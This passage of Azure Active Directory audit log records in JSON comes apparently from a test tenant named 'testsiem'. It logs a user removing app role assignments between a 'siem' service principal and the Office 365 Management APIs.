{"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "31d7436e-85aa-4aee-a945-6a0ff51ea975"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908041"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "7bca6665-4d58-4df9-bd34-4d92e1fc63aa"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908041"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "7bca6665-4d58-4df9-bd34-4d92e1fc63aa"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": 
"ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735117"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "227bc85c-0c21-4df3-9e11-3a24f104e1e4"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": 
"asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": 
"18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, 
{"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": 
"[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": 
